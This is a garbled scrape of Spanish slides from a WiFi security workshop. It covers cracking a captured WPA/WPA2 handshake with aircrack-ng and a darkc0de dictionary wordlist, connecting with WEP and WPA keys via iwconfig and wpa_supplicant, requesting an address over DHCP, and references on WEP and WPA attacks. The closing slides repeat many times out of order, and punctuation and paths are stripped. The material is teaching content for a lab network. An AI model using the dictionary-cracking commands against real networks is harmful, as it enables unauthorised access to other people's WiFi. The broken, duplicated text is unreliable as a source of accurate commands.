bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8494
diccionario
bull
Teclearlspentestpasswordswordlistdarkc0delst
WPAWPA2 ndash Usando el
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8594
diccionario
bull Teclear aircrack-ng WPACrackingDemo-01cap ndash
w pentestpasswordswordlistsdarkc0delst
WPAWPA2 ndash Obteniendo la
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8694
llave
bull
Se utilizan las combinaciones de frases deldiccionario
Conectaacutendonos con WEP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8794
Conectaacutendonos con WEP
bull
Teclear iwconfig wlan essid ldquoWireless Labrdquokey abcdefabcdefabcdefabcdef12
bull Para comprobar tecleamos iwconfig wlan0
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8894
Conectaacutendonos con WPA
bull
Iwconfig no soporta WPAWPA2bull Creamos un archivo de configuracioacuten llamado
wpa-suppconf
bull Teclear wpa_passphrase ldquoWirelessLabpassword gt
etcwpa_supplicantwpa_supplicantconf
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 8994
Conectaacutendonos con WPA
Conectaacutendonos con WPA
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9094
Conectaacutendonos con WPA
bull
Teclear wpa_supplicant ndash Dwext ndash iwlan0 ndash c bull etcwpa_supplicantwpa_supplicantconf
Utilizando el cliente DHCP
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9194
Utilizando el cliente DHCP
bull
Podemos solicitar una direccioacuten viacutea DHCPtecleando dhclient3 wlan0
Queacute aprendimos
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9294
Queacute aprendimos
Gracias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9394
Gracias
Dr Eduardo Ceh Varela
eduardocehutmetropolitanaedumx
Referencias
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners
7162019 Taller-inSeguridad WIFIpdf
httpslidepdfcomreaderfulltaller-inseguridad-wifipdf 9494
Referencias
bull
httpwwwbacktrack-linuxorgforumsshowthreadphpt=1133 bull httpwwwgenbetadevcomseguridad-
informaticatipos-de-criptografia-simetrica-asimetrica-e-hibrida
bull httpsecuritystackexchangecomquestions17434how-wep-wireless-security-works
bull httpwwwelladodelmalcom200808atacar-wpawpa2-psk-parte-i-de-ivhtml
bull CASP Study Guidebull BackTrack 5 Wireless Beginners